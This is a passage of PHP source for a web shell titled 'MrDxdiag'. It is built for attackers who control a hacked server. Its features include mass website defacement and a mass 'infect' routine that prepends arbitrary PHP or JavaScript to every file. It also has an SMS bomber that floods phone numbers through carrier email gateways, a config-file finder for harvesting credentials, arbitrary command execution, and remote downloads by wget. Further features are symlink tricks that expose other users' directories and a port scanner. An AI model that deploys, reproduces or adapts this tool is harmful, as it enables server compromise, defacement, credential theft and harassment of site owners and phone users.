779<option value='custom'>Custom</option>
780</select><br>
781Custom Directory: <input class='text' type='text' name='custom_dir' size='40'><br>
782Source of deface:<br>
783<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
784</textarea><br>
785This will not deface this shell.<br>
786<input type='submit' name='do_mass_deface' value='Deface'><br>
787</form>
788</font>
789</center>";
790}
791//Mass file infect
792if (isset($_POST['do_mass_infect'])) {
793 $masscode = " " . $_POST['massinfect_code'] . "\n";
794 $inf_dir = $_POST['infect_dir'];
795 $infcustom_dir = $_POST['cinfect_dir'];
796 $infcustom_dir = rtrim($infcustom_dir, "/");
797 $failed = 0;
798 $success = 0;
799 if (empty($masscode)) {
800 error("You must enter a code to infect files with!");
801 } elseif (empty($infcustom_dir) && $inf_dir == "custom") {
802 error("You must enter a custom directory when using the Custom option!");
803 } else {
804 if ($inf_dir == "root") {
805 $mddir = $rootdir;
806 }
807 if ($inf_dir == "custom") {
808 $mddir = $infcustom_dir;
809 }
810 foreach (files($mddir) as $key => $file) {
811 $file2 = trim($file, ".");
812 $getinf_file = file_get_contents($file2);
813 if ("$file2" == "$dir/$script2") {
814 echo "";
815 } else {
816 if (file_put_contents("$file2", $masscode) && file_put_contents("$file2", $getinf_file, FILE_APPEND)) {
817 echo "<font color='green'><b>Successfully infected file: $file2</b></font><br>";
818 $success++;
819 } else {
820 echo "<font color='red'><b>Failed to infect file: $file2</b></font><br>";
821 $failed++;
822 }
823 }
824 }
825 echo "<font color='#14ab00'><b>$success files successfully infected!<br>Failed to infect $failed files!</b></font><br>";
826 }
827}
828if (isset($_GET['massinfect'])) {
829 $example = "<?php system() ?>";
830 $example = htmlspecialchars($example);
831 $example2 = "<script>alert()</script>";
832 $example2 = htmlspecialchars($example2);
833 echo "<center>
834<font color='#14ab00'>
835<form action='' method='post'>
836Directory to start infect from:<br>
837<select name='infect_dir'>
838<option value='root'>Root</option>
839<option value='custom'>Custom</option>
840</select><br>
841Custom Directory: <input class='text' type='text' name='cinfect_dir' size='40'><br>
842This is great for infecting mass files with javascript scripts or php scripts<br>
843It will append the code to the top of each file.<br>
844Example:<br>
845$example<br>
846$example2<br>
847Infect code:<br>
848<textarea rows='20' cols='150' name='massinfect_code' style='color:#000'>
849</textarea><br>
850This will not infect this shell.<br>
851<input type='submit' name='do_mass_infect' value='Infect'><br>
852</form>
853</font>
854</center>";
855}
856//SMS Bomber stuff
857if (isset($_POST['do_bomb_sms'])) {
858 $phonenum = $_POST['phnumber'];
859 $carrier = $_POST['carrier'];
860 $amount = $_POST['numberof'];
861 $from = $_POST['from'];
862 $headers = "From: $from\r\n";
863 $headers.= 'MIME-Version: 1.0' . "\n";
864 $headers.= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
865 $subject = $_POST['subject'];
866 $to = "$phonenum$carrier";
867 $numsent = 0;
868 $sent_fail = 0;
869 $sent_success = 0;
870 $msgcontent = $_POST['message_content'];
871 if (empty($phonenum) OR empty($amount) OR empty($from) OR empty($subject) OR empty($msgcontent)) {
872 error("All Fields Must Entered!");
873 } else {
874 while ($numsent < $amount) {
875 if (!@mail($to, $subject, $msgcontent, $headers)) {
876 $numsent++;
877 $sent_fail++;
878 } else {
879 $numsent++;
880 $sent_success++;
881 }
882 }
883 echo "<font color='#14ab00'>Successfully sent $sent_success messages.<br>
884Failed to send $sent_fail messages.<br>";
885 }
886}
887if (isset($_GET['sms'])) {
888 echo "<font color='#14ab00'>
889<table class='noborder'>
890<tr>
891<form action='' method='post'>
892<td>Phone Number With Area Code</td>
893<td><input type='text' name='phnumber' class='text'></td>
894</tr>
895<tr>
896<td>Carrier:</td>
897<td>
898<select name='carrier'>
899<option value='@sms.3rivers.net'>3 River Wireless</option>
900<option value='@paging.acswireless.com'>ACS Wireless</option>
901<option value='@advantagepaging.com'>Advantage Communications</option>
902<option value='@airtelkk.com'>Airtel (Karnataka, India)</option>
903<option value='@sms.airtelmontana.com'>Airtel Wireless (Montana, USA)</option>
904<option value='@airtouch.net'>Airtouch Pagers</option>
905<option value='@airtouchpaging.com'>Airtouch Pagers</option>
906<option value='@alphapage.airtouch.com'>Airtouch Pagers</option>
907<option value='@myairmail.com'>Airtouch Pagers</option>
908<option value='@msg.acsalaska.com'>Alaska Communications Systems</option>
909<option value='@message.alltel.com'>Alltel</option>
910<option value='@alphanow.net'>AlphaNow</option>
911<option value='@page.americanmessaging.net'>American Messaging</option>
912<option value='@clearpath.acswireless.com'>Ameritech Clearpath</option>
913<option value='@paging.acswireless.com'>Ameritech Paging</option>
914<option value='@pageapi.com'>Ameritech Paging</option>
915<option value='@airtelap.com'>Andhra Pradesh Airtel</option>
916<option value='@text.aql.com'>Aql</option>
917<option value='@archwireless.net'>Arch Pagers (PageNet)</option>
918<option value='@epage.arch.com'>Arch Pagers (PageNet)</option>
919<option value='@mobile.att.net'>AT&T</option>
920<option value='@txt.att.net'>AT&T2</option>
921<option value='@page.att.net'>AT&T Enterprise Paging</option>
922<option value='@mmode.com'>AT&T Free2Go</option>
923<option value='@mobile.att.net'>AT&T PCS</option>
924<option value='@dpcs.mobile.att.net'>AT&T Pocketnet PCS</option>
925<option value='@sms.beemail.ru'>BeeLine GSM</option>
926<option value='@beepwear.net'>Beepwear</option>
927<option value='@message.bam.com'>Bell Atlantic</option>
928<option value='@bellmobility.ca'>Bell Canada</option>
929<option value='@txt.bellmobility.ca'>Bell Canada2</option>
930<option value='@txt.bell.ca'>Bell Mobility (Canada)</option>
931<option value='@bellsouth.cl'>Bell South</option>
932<option value='@blsdcs.net'>Bell South2</option>
933<option value='@sms.bellsouth.com'>Bell South3</option>
934<option value='@wireless.bellsouth.com'>Bell South4</option>
935<option value='@bellsouthtips.com'>Bell South (Blackberry)</option>
936<option value='@blsdcs.net'>Bell South Mobility</option>
937<option value='@tachyonsms.co.uk'>BigRedGiant Mobile Solutions</option>
938<option value='@blueskyfrog.com'>Blue Sky Frog</option>
939<option value='@sms.bluecell.com'>Bluegrass Cellular</option>
940<option value='@myboostmobile.com'>Boost</option>
941<option value='@bplmobile.com'>BPL Mobile</option>
942<option value='@@bplmobile.com'>BPL Mobile (Mumbai, India)</option>
943<option value='@cmcpaging.com'>Carolina Mobile</option>
944<option value='@cwwsms.com'>Carolina West Wireless</option>
945<option value='@cell1.textmsg.com'>Cellular One</option>
946<option value='@cellularone.textmsg.com'>Cellular One2</option>
947<option value='@message.cellone-sf.com'>Cellular One3</option>
948<option value='@mobile.celloneusa.com'>Cellular One4</option>
949<option value='@sbcemail.com'>Cellular One5</option>
950<option value='@phone.cellone.net'>Cellular One (East Coast)</option>
951<option value='@swmsg.com'>Cellular One (South West)</option>
952<option value='@mycellone.com'>Cellular One (West)</option>
953<option value='@paging.cellone-sf.com'>Cellular One PCS</option>
954<option value='@csouth1.com'>Cellular South</option>
955<option value='@cwemail.com'>Centennial Wireless</option>
956<option value='@cvcpaging.com'>Central Vermont</option>
957<option value='@messaging.centurytel.net'>CenturyTel</option>
958<option value='@rpgmail.net'>Chennai RPG Cellular</option>
959<option value='@airtelchennai.com'>Chennai Skycell / Airtel</option>
960<option value='@gocbw.com'>Cincinnati Bell</option>
961<option value='@cingularme.com'>Cingular</option>
962<option value='@mms.cingularme.com'>Cingular2</option>
963<option value='@mycingular.com'>Cingular3</option>
964<option value='@page.cingular.com'>Cingular5</option>
965<option value='@txt.att.net'>Cingular (Now AT&T)</option>
966<option value='@clarotorpedo.com.br'>Claro (Brasil)</option>
967<option value='@ideasclaro-ca.com'>Claro (Nicaragua)</option>
968<option value='@msg.clearnet.com'>Clearnet</option>
969<option value='@comcastpcs.textmsg.com'>Comcast</option>
970<option value='@comcel.com.co'>Comcel</option>
971<option value='@sms.comviq.se'>Comviq</option>
972<option value='@cookmail.com'>Cook Paging</option>
973<option value='@corrwireless.net'>Corr Wireless Communications</option>
974<option value='@sms.mycricket.com'>Cricket</option>
975<option value='@sms.ctimovil.com.ar'>CTI</option>
976<option value='@airtelmail.com'>Delhi Aritel</option>
977<option value='@delhi.hutch.co.in'>Delhi Hutch</option>
978<option value='@page.hit.net'>Digi-Page / Page Kansas</option>
979<option value='@mobile.dobson.net'>Dobson</option>
980<option value='@sms.orange.nl'>Dutchtone / Orange-NL</option>
981<option value='@sms.edgewireless.com'>Edge Wireless</option>
982<option value='@sms.emt.ee'>EMT</option>
983<option value='@emtelworld.net'>Emtel (Mauritius)</option>
984<option value='@escotelmobile.com'>Escotel</option>
985<option value='@fido.ca'>Fido</option>
986<option value='@epage.gabrielwireless.com'>Gabriel Wireless</option>
987<option value='@sendabeep.net'>Galaxy Corporation</option>
988<option value='@webpager.us'>GCS Paging</option>
989<option value='@msg.gci.net'>General Communications Inc.</option>
990<option value='@t-mobile-sms.de'>German T-Mobile</option>
991<option value='@msg.globalstarusa.com'>Globalstar (satellite)</option>
992<option value='@bplmobile.com'>Goa BPLMobil</option>
993<option value='@sms.goldentele.com'>Golden Telecom</option>
994<option value='@epage.porta-phone.com'>GrayLink / Porta-Phone</option>
995<option value='@celforce.com'>Gujarat Celforce</option>
996<option value='@messaging.sprintpcs.com'>Helio</option>
997<option value='@text.houstoncellular.net'>Houston Cellular</option>
998<option value='@ideacellular.net'>Idea Cellular</option>
999<option value='@ivctext.com'>Illinois Valley Cellular</option>
1000<option value='@page.infopagesystems.com'>Infopage Systems</option>
1001<option value='@inlandlink.com'>Inland Cellular Telephone</option>
1002<option value='@msg.iridium.com'>Iridium (satellite)</option>
1003<option value='@rek2.com.mx'>Iusacell</option>
1004<option value='@jsmtel.com'>JSM Tele-Page</option>
1005<option value='@msg.koodomobile.com'>Koodo Mobile (Canada)</option>
1006<option value='@mci.com'>MCI Phone</option>
1007<option value='@sms.mymeteor.ie'>Meteor</option>
1008<option value='@metropcs.sms.us'>Metro PCS</option>
1009<option value='@clearlydigital.com'>Midwest Wireless</option>
1010<option value='@mobilecomm.net'>Mobilcomm</option>
1011<option value='@text.mtsmobility.com'>MTS</option>
1012<option value='@sms.netcom.no'>Netcom</option>
1013<option value='@messaging.nextel.com'>Nextel</option>
1014<option value='@o2.co.uk'>O2</option>
1015<option value='@o2imail.co.uk'>O2#2</option>
1016<option value='@mmail.co.uk'>O2 (M-mail)</option>
1017<option value='@orange.net'>Orange</option>
1018<option value='@qwestmp.com'>Qwest</option>
1019<option value='@pcs.rogers.com'>Rogers</option>
1020<option value='@sms.sasktel.com'>Sasktel (Canada)</option>
1021<option value='@mysmart.mymobile.ph'>Smart Telecom</option>
1022<option value='@messaging.sprintpcs.com'>Sprint</option>
1023<option value='@tms.suncom.com'>Sumcom</option>
1024<option value='@tmomail.net'>T-Mobile</option>
1025<option value='@t-mobile.uk.net'>T-Mobile (UK)</option>
1026<option value='@t-d1-sms.de'>T-Mobile Germany</option>
1027<option value='@txt.att.net'>Tracfone</option>
1028<option value='@mmst5.tracfone.com'>Tracfone (prepaid)</option>
1029<option value='@vtext.com'>Verizon</option>
1030<option value='@vmobl.com'>Virgin Mobile</option>
1031<option value='@vmobile.ca'>Virgin Mobile (Canada)</option>
1032<option value='@vodafone.net'>Vodafone UK</option>
1033</select>
1034</td>
1035</tr>
1036<tr>
1037<td>Amount Of Messages To Send:</td>
1038<td><input type='text' name='numberof' size='10' class='text'></td>
1039</tr>
1040<tr>
1041<td>From:</td>
1042<td><input type='text' name='from' class='text'></td>
1043</tr>
1044<tr>
1045<td>Subject:</td>
1046<td><input type='text' size='85' class='text' name='subject'></td>
1047</tr>
1048</table>
1049Message Content:<br>
1050<textarea rows='20' cols='150' name='message_content' style='color:#000000'>
1051</textarea><br>
1052<input type='submit' name='do_bomb_sms' value='Bomb'><br>
1053</form><br></font><br>";
1054}
1055//Config finder
1056if (isset($_GET['config'])) {
1057 $configs_found = 0;
1058 foreach (files($rootdir) as $key => $cfile) {
1059 $file2 = trim($cfile, ".");
1060 $cex = explode("/", $file2);
1061 $cex2 = end($cex);
1062 if (preg_match('/config/', $cex2)) {
1063 echo "<a class='navbar' href='http://$domain$script?editfile=$file2'>$file2</a><br>";
1064 $configs_found++;
1065 }
1066 }
1067 if ($configs_found == "0") {
1068 error("No configuration files found!");
1069 } else {
1070 echo "<font color='#14ab00'>$configs_found Configuration files found!</font><br><br>";
1071 success("configs_found", $configs_found);
1072 }
1073}
1074//Search
1075if (isset($_GET['search'])) {
1076 echo "<center><font color='#14ab00' size='3'>
1077<form action='' method='post'>
1078Directory to search in:<br>
1079<input type='text' name='search_dir' class='text' size='50' value='$dir'><br>
1080Value to search for:<br>
1081<input type='text' name='search_value' class='text'><br>
1082<input type='submit' name='do_search' value='Search'>
1083</form>
1084</font>
1085</center>";
1086}
1087if (isset($_POST['do_search'])) {
1088 $searchdir = $_POST['search_dir'];
1089 $searchval = $_POST['search_value'];
1090 $matches = 0;
1091 foreach (files($searchdir) as $key => $cfile) {
1092 $file2 = trim($cfile, ".");
1093 $cex = explode("/", $file2);
1094 $cex2 = end($cex);
1095 if (preg_match('/' . $searchval . '/', $cex2)) {
1096 echo "<a class='navbar' href='http://$domain$script?editfile=$file2'>$file2</a><br>";
1097 $matches++;
1098 }
1099 }
1100 if ($matches == 0) {
1101 error("No files that match $searchval");
1102 } else {
1103 echo "<font color='#14ab00' size='3'>$matches files found that match $searchval</font><br>";
1104 success("files_found", $matches);
1105 }
1106}
1107//Unzip
1108if (isset($_GET['unzipfile'])) {
1109 $unzipfile = $_GET['unzipfile'];
1110 $redir = dirname($unzipfile);
1111 unzip($unzipfile, rtrim($redir, '/'));
1112}
1113//Exectue Command
1114if (isset($_POST['do_exe_command'])) {
1115 $ecmd = $_POST['exe_command'];
1116 $exe_cmd = cmd2($ecmd, $dir);
1117 echo "<center><font color='#14ab00'>
1118<form action='' method='post'>
1119<input type='text' class='text' name='exe_command' size='60'>
1120<input type='submit' name='do_exe_command' value='Execute'><br>
1121</form>
1122Result:<br>
1123<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
1124$exe_cmd
1125</textarea></font></center><br><br>";
1126}
1127//wget file
1128if (isset($_POST['do_wget_file'])) {
1129 $wget_file = $_POST['wget_file'];
1130 $wecmd = "wget $wget_file";
1131 $wget_ecmd = cmd2($wecmd, $dir);
1132 echo "<center><font color='#14ab00'>
1133Result:<br>
1134<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
1135$wget_ecmd
1136</textarea></font></center><br><br>";
1137}
1138//Domain information
1139//Get domains hosted on server from yougetsignal.com
1140if (isset($_GET['domaininfo'])) {
1141 echo "<font color='#14ab00' size='3'>";
1142 $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
1143 $num = 0;
1144 $count = sizeof($dns_record);
1145 echo "<br>Name Servers:</b><br>";
1146 while ($num < $count) {
1147 $name_servers = $dns_record[$num];
1148 $name_servers2 = $name_servers['type'];
1149 $name_servers3 = @$name_servers['target'];
1150 $num++;
1151 if ($name_servers2 == "NS") {
1152 echo "$name_servers3<br>";
1153 $nshost = @$name_servers['host'];
1154 }
1155 if ($name_servers2 == "SOA") {
1156 $nsemail = $name_servers['rname'];
1157 }
1158 if ($name_servers2 == "A") {
1159 $nsip = $name_servers['ip'];
1160 }
1161 }
1162 $num = 0;
1163 echo "<br><table class='noborder'>
1164<tr>
1165<td><b>Host:</b></td>
1166<td>$nshost</td>
1167</tr>
1168<tr>
1169<td><b>IP:</b></td>
1170<td>$nsip</td>
1171</tr>
1172<tr>
1173<td><b>Email:</b></td>
1174<td>$nsemail</td>
1175</tr>
1176</table><br>";
1177 $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
1178 $status = $domains_on_server->status;
1179 $message = $domains_on_server->message;
1180 $domainAr = $domains_on_server->domainArray;
1181 $num_of_site = $domains_on_server->domainCount;
1182 $count = sizeof($domainAr);
1183 if ($status == "Success") {
1184 echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
1185 while ($num < $count) {
1186 $hossites = $domainAr[$num];
1187 $num++;
1188 $hossites3 = $domainAr[$num];
1189 $hossites3 = $hossites3[0];
1190 $hossites = $hossites[0];
1191 $site_ips = empty($hossites) ? "" : "(" . gethostbyname($hossites) . ")";
1192 $site_ips2 = empty($hossites3) ? "" : "(" . gethostbyname($hossites3) . ")";
1193 echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
1194 $num++;
1195 }
1196 echo "</table><br>";
1197 $num = 0;
1198 } else {
1199 error("Failed to find or get sites hosted on same server from: <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
1200 }
1201 echo "</font><br>";
1202}
1203//Encrypt string
1204if (isset($_GET['encrypt'])) {
1205 echo "<form action='' method='post'>
1206<center><font color='#14ab00'>
1207<input type='text' name='en_string' class='text'>
1208<input type='submit' name='do_encrypt' value='Encrypt String'>
1209</form>
1210</font></center>";
1211}
1212if (isset($_POST['do_encrypt'])) {
1213 $vbsalt = gen_salt("30");
1214 $vbsalt2 = gen_salt("3");
1215 $mybbsalt = gen_salt("8");
1216 $ipbsalt = gen_salt("5");
1217 $joomlasalt = gen_salt("32");
1218 $password = $_POST['en_string'];
1219 $md5 = md5($password);
1220 $md52 = md5(md5($password));
1221 $md53 = md5(md5(md5($password)));
1222 $sha1 = sha1($password);
1223 $sha256 = hash('sha256', $password);
1224 $vbalg = md5(md5($password) . $vbsalt);
1225 $vbalg2 = md5(md5($password) . $vbsalt2);
1226 $mybbalg = md5(md5($mybbsalt) . $password);
1227 $ipbalg = md5(md5($ipbsalt) . md5($password));
1228 $joomlaalg = md5($password . $joomlasalt);
1229 $en_result = "Hashes for string: $password\nMD5: $md5\nmd5(md5(pass)): $md52\nmd5(md5(md5(pass))): $md53\nSHA-1: $sha1\nSHA-256: $sha256\nvBulletin 4: $vbalg:$vbsalt\nvBulletin 3: $vbalg2:$vbsalt2\nMyBB: $mybbalg:$mybbsalt\nIPB: $ipbalg:$ipbsalt\nJoomla 1.0.13+: $joomlaalg:$joomlasalt\n";
1230 echo "<center>
1231<textarea rows='20' cols='150' style='color:#000'>
1232$en_result
1233</textarea>
1234</center><br>";
1235}
1236//Symlink Stuff
1237if (isset($_GET['symlink'])) {
1238 echo "<center><font color='#14ab00'>
1239<form action='' method='post'>
1240Directory To Symlink:<br>
1241<input type='text' name='sym_dir' class='text' size='40'>
1242<input type='submit' name='do_sym' value='Create Symlink'>
1243</form><br>";
1244 if (isset($_POST['do_sym'])) {
1245 $symdir = rtrim($_POST['sym_dir'], '/');
1246 $symdir3 = trim($_POST['sym_dir'], '/');
1247 $symdir2 = str_replace("/", "-", $symdir3);
1248 if (!is_dir("$dir/ssym")) {
1249 if (mkdir("$dir/ssym")) {
1250 $htaccess = "Options Indexes FollowSymLinks\nDirectoryIndex sssss.htm\nAddType txt .php\nAddHandler txt .php";
1251 if (file_put_contents("$dir/ssym/.htaccess", $htaccess)) {
1252 } else {
1253 error("Failed to make .htaccess file!");
1254 }
1255 cmd2("ln -s $symdir/ $symdir2", "$dir/ssym");
1256 echo "<center><a class='navbar' href='./ssym/$symdir2'>$symdir/</a></center>";
1257 } else {
1258 error("Failed to make symlink directory");
1259 }
1260 } else {
1261 cmd2("ln -s $symdir/ $symdir2", "$dir/ssym");
1262 echo "<center><a class='navbar' href='./ssym/$symdir2'>$symdir</a></center><br>";
1263 }
1264 }
1265 $opensymdir = opendir("$dir/ssym");
1266 $symdirs = array();
1267 while ($symfile = readdir($opensymdir)) {
1268 if ($symfile != "." && $file != "..") {
1269 if (is_link("$dir/ssym/$symfile")) {
1270 array_push($symdirs, $symfile);
1271 } else {
1272 }
1273 }
1274 }
1275 if (empty($symdirs)) {
1276 error("No symlinks found!");
1277 } else {
1278 echo "<b>Symlink's Found!</b><br><table class='noborder'>
1279<tr>
1280<th>Link</th>
1281<th>Link</th>
1282</tr>";
1283 $numsym = count($symdirs);
1284 $num = 0;
1285 while ($num < $numsym) {
1286 $symmdir = $symdirs[$num];
1287 $num++;
1288 $symmdir2 = $symdirs[$num];
1289 $num++;
1290 $symd = readlink("$dir/ssym/$symmdir");
1291 $symd2 = readlink("$dir/ssym/$symmdir2");
1292 echo "<tr><td><a href='./ssym/$symmdir' class='navbar'>$symd</a></td><td><a href='./ssym/$symmdir2' class='navbar'>$symd2</a></td></tr>";
1293 }
1294 }
1295 echo "</table><br>
1296</font></center>";
1297}
1298//Port scan
1299if (isset($_GET['scan'])) {
1300 echo "<center><font color='#14ab00' size='3'>
1301Port Scan:<br>
1302<form action='' method='post'>
1303Host: <input type='text' name='scan_host' class='text' value='$domain'><br>
1304Start port: <input type='text' name='start_port' class='text' size='6'>
1305End port: <input type='text' name='end_port' class='text' size='7'><br>
1306<input type='submit' name='start_scan' value='Scan'>
1307</form>
1308</font>
1309</center>";
1310}
1311if (isset($_POST['start_scan'])) {
1312 $scanhost = $_POST['scan_host'];
1313 $startport = $_POST['start_port'];
1314 $endport = $_POST['end_port'];
1315 while ($startport <= $endport) {
1316 if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) {
1317 echo "<font color='green' size='3'>Port $startport is open on $scanhost</font><br>";
1318 } else {
1319 echo "<font color='red' size='3'>Port $startport is not open on $scanhost</font><br>";
1320 }
1321 $startport++;
1322 }
1323}
1324//Don't put anything you don't want to be echo'd
1325//out between the misc system bar and misc file bar
1326//here!
1327//echo out misc file bar.
1328$wr = is_writeable($dir) ? "<font color='green'><b>[ Writeable ]</b></font>" : "<font color='red'><b>[ Non Writeable ]</b></font>";
1329echo "<table border='1' width='100%' frame='void'>
1330<tr>
1331<td>
1332<center>
1333Create directory:<br>
1334<form action='' method='post'>
1335<input type='text' class='textround' name='create_dir' value='$dir/newdir' size='50'>
1336<input type='submit' name='do_create_dir' value='Create'><br>
1337$wr
1338</form>
1339</center>
1340</td>
1341<td>
1342<center>
1343Create file:<br>
1344<form action='' method='post'>
1345<input type='text' class='textround' name='create_file' value='$dir/newfile.php' size='50'>
1346<input type='submit' name='do_create_file' value='Create'><br>
1347$wr
1348</form>
1349</center>
1350</td>
1351</tr>
1352<tr>
1353<td>
1354<center>
1355Go to directory:<br>
1356<form action='' method='post'>
1357<input type='text'class='textround' name='go_dir' value='/tmp' size='50'>
1358<input type='submit' name='do_go_dir' value='Go'><br>
1359</form>
1360</center>
1361</td>
1362<td>
1363<center>
1364Edit file:<br>
1365<form action='' method='post'>
1366<input type='text' class='textround' name='go_edit_file' value='$dir/index.php' size='50'>
1367<input type='submit' name='do_go_edit' value='Edit'><br>
1368</form>
1369</center>
1370</td>
1371</tr>
1372<tr>
1373<td>
1374<center>
1375<form action='' method='post' enctype='multipart/form-data'>
1376Upload to location:<br>
1377<input type='text' class='text' style='width: 300px' value='$dir/' name='upload_location'></br><input type='file' name='upload_file'>
1378<input type='submit' value='Upload' name='do_upload_file'><br>
1379$wr
1380</form>
1381</center>
1382</td>
1383<td>
1384<center>
1385<form action='' method='post'>
1386wget file:<br>
1387<input type='text' name='wget_file' class='text' size='50' value='http://'>
1388<input type='submit' name='do_wget_file' value='wget'>
1389</form>
1390</center>
1391</td>
1392</tr>
1393<table border='1' frame='void' width='100%'>
1394<tr>
1395<td>
1396<center>
1397<form action='' method='post'>
1398Execute Command:<br>
1399<input type='text' class='text' name='exe_command' size='60'>
1400<input type='submit' name='do_exe_command' value='Execute'><br>
1401</form>
1402</center>
1403</td>
1404</tr>
1405</table>
1406<br><br><br>";
1407//echo out files
1408echo "<table border='1' width='100%' frame='void'>
1409<tr>
1410<th>
1411Current Directory: ";
1412$ex = explode("/", $dir);
1413for ($p = 0;$p < count($ex);$p++) {
1414 @$linkpath.= $ex[$p] . '/';
1415 $linkpath2 = rtrim($linkpath, "/");
1416 echo "<a href=http://$domain$script?path=$linkpath2>$ex[$p]</a>/";
1417}
1418echo "</th>
1419</tr>
1420</table>
1421<div id='hover'>
1422<table border='1' width='100%'>
1423<form action='' method='post' id='checkboxall'>
1424<tr>
1425<th>Directory/File Name</th>
1426<th>Owner/Group</th>
1427<th>Permissions</th>
1428<th>Writeable</th>
1429<th>Size</th>
1430<th>Last Modified</th>
1431<th>Delete</th>
1432<th>Rename</th>
1433<th>Mass</th>
1434</tr>
1435";
1436foreach ($direcs as $d) {
1437 $downer = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$d")) : fileowner("$dir/$d");
1438 $dgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$d")) : filegroup("$dir/$d");
1439 if (is_array($downer)) {
1440 $downer = $downer['name'];
1441 }
1442 if (is_array($dgroup)) {
1443 $dgroup = $dgroup['name'];
1444 }
1445 $dperms = substr(base_convert(fileperms("$dir/$d"), 10, 8), 2);
1446 $dwrite = is_writeable("$dir/$d") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
1447 $dsize = "Directory";
1448 $dtime = date("F d Y g:i:s", filemtime("$dir/$d"));
1449 echo "<tr>
1450<td><a href='http://$domain$script?path=$dir/$d'>$d</a></td>
1451<td style='text-align: center;'>$downer/$dgroup</td>
1452<td style='text-align: center;'>$dperms</td>
1453<td style='text-align: center;'>$dwrite</td>
1454<td style='text-align: center;'>$dsize</td>
1455<td style='text-align: center;'>$dtime</td>
1456<td style='text-align: center;'><a href='http://$domain$script?deldir=$dir/$d'>Delete</a></td>
1457<td style='text-align: center;'><a href='http://$domain$script?rendir=$dir&old=$d'>Rename</a></td>
1458<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$d'></td>
1459</tr>";
1460}
1461foreach ($files as $f) {
1462 $fowner = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$f")) : fileowner("$dir/$f");
1463 $fgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$f")) : filegroup("$dir/$f");
1464 if (is_array($fowner)) {
1465 $fowner = $fowner['name'];
1466 }
1467 if (is_array($fgroup)) {
1468 $fgroup = $fgroup['name'];
1469 }
1470 $fperms = substr(base_convert(fileperms("$dir/$f"), 10, 8), 2);
1471 $fwrite = is_writeable("$dir/$f") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
1472 $fsize = ByteConversion(filesize("$dir/$f"));
1473 $ftime = date("F d Y g:i:s", filemtime("$dir/$f"));
1474 $zip_file = explode(".", $f);
1475 $zip_file2 = end($zip_file);
1476 echo "<tr>";
1477 if ($zip_file2 == "zip") {
1478 echo "<td><a href='http://$domain$script?unzipfile=$dir/$f'>$f</td>";
1479 } else {
1480 echo "<td><a href='http://$domain$script?editfile=$dir/$f'>$f</td>";
1481 }
1482 echo "<td style='text-align: center;'>$fowner/$fgroup</td>
1483<td style='text-align: center;'>$fperms</td>
1484<td style='text-align: center;'>$fwrite</td>
1485<td style='text-align: center;'>$fsize</td>
1486<td style='text-align: center;'>$ftime</td>
1487<td style='text-align: center;'><a href='http://$domain$script?delfile=$dir/$f'>Delete</a></td>
1488<td style='text-align: center;'><a href='http://$domain$script?renfile=$dir&old=$f'>Rename</a></td>
1489<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$f'></td>
1490</tr>";
1491}
1492echo "</table></div>";
1493echo "<div id='bottom'><font color='#14ab00'>With all selected:</font><br>
1494<input type='button' onclick='checkall();' value='Select/Unselect All'>
1495<select name='mass_action'>
1496<option value='Delete'>Delete</option>
1497<option value='chmod'>chmod</option>
1498</select>
1499<input type='text' name='chmod_value' class='text' value='chmod value' size='9' id='ch' onfocus='removeValue()'>
1500<input type='submit' name='mass_files'><br></div>";
1501echo "</form>";
1502closedir();
1503?>
1504<title>MrDxdiag</title>
1505<!-- CSS Start !-->
1506<style type="text/css">
1507 a:link {color: #FFFFFF; text-decoration: none; }
1508 a:active {color: #FFFFFF; text-decoration: none; }
1509 a:visited {color: #FFFFFF; text-decoration: none; }
1510 a:hover {color: #000000; text-decoration: none; }
1511 a.navbar:link {color: #FFFFFF; text-decoration: none; }
1512 a.navbar:visited {color: #FFFFFF; text-decoration: none; }
1513 a.navbar:active {color: #FFFFFF; text-decoration: none; }
1514 a.navbar:hover {color: #303030; text-decoration: none; }
1515 body {
1516 background: #121212 url(http://www.p0wersurge.com/forums/images/pscustom/new/ps5skin-min.png) center top repeat-x;
1517 font-family: consolas;
1518 font-weight: bold;
1519 font-size: 12px;
1520 color:#000000;
1521 }
1522 table
1523 {
1524 border-width: 2px;
1525 border-spacing: 2px;
1526 border-style: solid;
1527 border-color: #14ab00;
1528 background-color: #303030;
1529 }
1530 #hover tr:hover{
1531 background-color: #14ab00;
1532 }
1533 .noborder, .noborder tr, .noborder th, .noborder td { border: none; background-color: transparent; color: #14ab00;}
1534 table.th {
1535 padding: 1px;
1536 border-color: #303030;
1537 background-color: #303030;
1538 }
1539 table.td {
1540 padding: 1px;
1541 border-color: #303030;
1542 background-color: #303030;
1543 }
1544 textarea {
1545 border: 3px solid #14ab00;
1546 padding: 3px;
1547 background-color: #303030;
1548 outline-color:#14ab00;
1549 resize: none;
1550 }
1551 .text {
1552 border: 2px solid #14ab00;
1553 padding: 3px;
1554 background-color: #303030;
1555 outline-color:#14ab00;
1556 }
1557 .textround {
1558 border: 2px solid #14ab00;
1559 padding: 3px;
1560 background-color: #303030;
1561 outline-color:#14ab00;
1562 -webkit-border-top-left-radius: 7px;
1563 -khtml-border-radius-topleft: 7px;
1564 -moz-border-radius-topleft: 7px;
1565 border-top-left-radius: 7px;
